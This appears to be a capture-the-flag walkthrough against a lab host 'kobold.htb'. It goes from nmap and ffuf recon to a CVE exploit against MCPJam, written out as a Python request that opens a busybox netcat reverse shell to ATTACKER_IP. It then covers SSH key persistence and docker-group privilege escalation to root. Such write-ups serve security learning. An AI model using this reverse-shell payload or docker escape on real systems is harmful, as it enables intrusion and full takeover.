Target: 10.129.10.80

                          [ RECON ]

sudo nmap -sC -sV 10.129.10.80 -p- --min-rate=1000 -T4
     22/tcp open ssh -> OpenSSH 9.6p1
     80/tcp open http -> nginx 1.24.0 -> domain: kobold.htb
     443/tcp open ssl/http -> same nginx
     3552/tcp open http -> Golang net/http server

sudo nmap -sU 10.129.10.80
     Nothing open
-------
ffuf -u https://kobold.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt
      No valid response

ffuf -u https://kobold.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt
      No valid response

ffuf -u https://kobold.htb/ -H "Host: FUZZ.kobold.htb" -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt --fw 4
      bin.kobold.htb
      mcp.kobold.htb

ffuf -u http://kobold.htb:3552/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt --fw 84
      /img

ffuf -u https://bin.kobold.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt --fw 1218
      /img -> all status 301
      /css
      /js
      /i18n

ffuf -u https://mcp.kobold.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt --fw 57
       /health -> status 200
--------------------------
Found from kobold.htb:
© 2026 Kobold Systems · Contact: admin@kobold.htb

Found from kobold.htb/login:
Arcane version 1.13.0 - default creds did not work

Found from bin.kobold.htb:
PrivateBin 2.0.2

Found CVE-2025-64711 for PrivateBin 2.0.2
File upload is not enabled so CVE does not work

Found MCPJam Version: v1.4.2 from mcp.kobold.htb settings page

Found CVE-2026-23744 for MCPJam v1.4.2

                          [ EXPLOIT ]

Payload:
import requests
import json


target = "https://mcp.kobold.htb"
ip = "ATTACKER_IP"
port = "ATTACKER_PORT"

url = f'{target}/api/mcp/connect'


data = {
    "serverConfig": {
        "command": "busybox",
        "args": [
            "nc",
            f"{ip}",
            f"{port}",
            "-e",
            "/bin/bash"
        ],
        "env": {}
    },
    "serverId": "213j1l3jkljkl3j"
}

response = requests.post(url, json=data, verify=False)

print(response.status_code)
print(response.text)

Got user shell.

                      [ RECON VIA USER SHELL ]

Initial shell pwn location: /usr/local/lib/node_modules/@mcpjam/inspector
Stabilize shell pub key -> ben's authorized_keys

from .ssh target directory: echo 'pubkeyofmine' > authorized_keys

Pspy64 output:
UID=0     PID=1955   | /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.17.0.2 -container-port 8080 -use-listen-fd 

ssh -i key -L 8080:127.0.0.1:8080 ben@kobold.htb -> to access web

newgrp docker -> this adds ben to docker group

Attack vector docker image:

                 [ PRIVILEGE ESCALATION ]

docker run -it --rm -v /:/mnt privatebin/nginx-fpm-alpine:2.0.2 sh
entrypoint enables so I did not got shell

docker run -it --rm --privileged --entrypoint sh -v /:/mnt privatebin/nginx-fpm-alpine:2.0.2
got the shell but low privileged

docker run -it --rm -u 0 --entrypoint /bin/sh -v /:/mnt privatebin/nginx-fpm-alpine:2.0.2

now we are in root

cat /mnt/root/root.txt
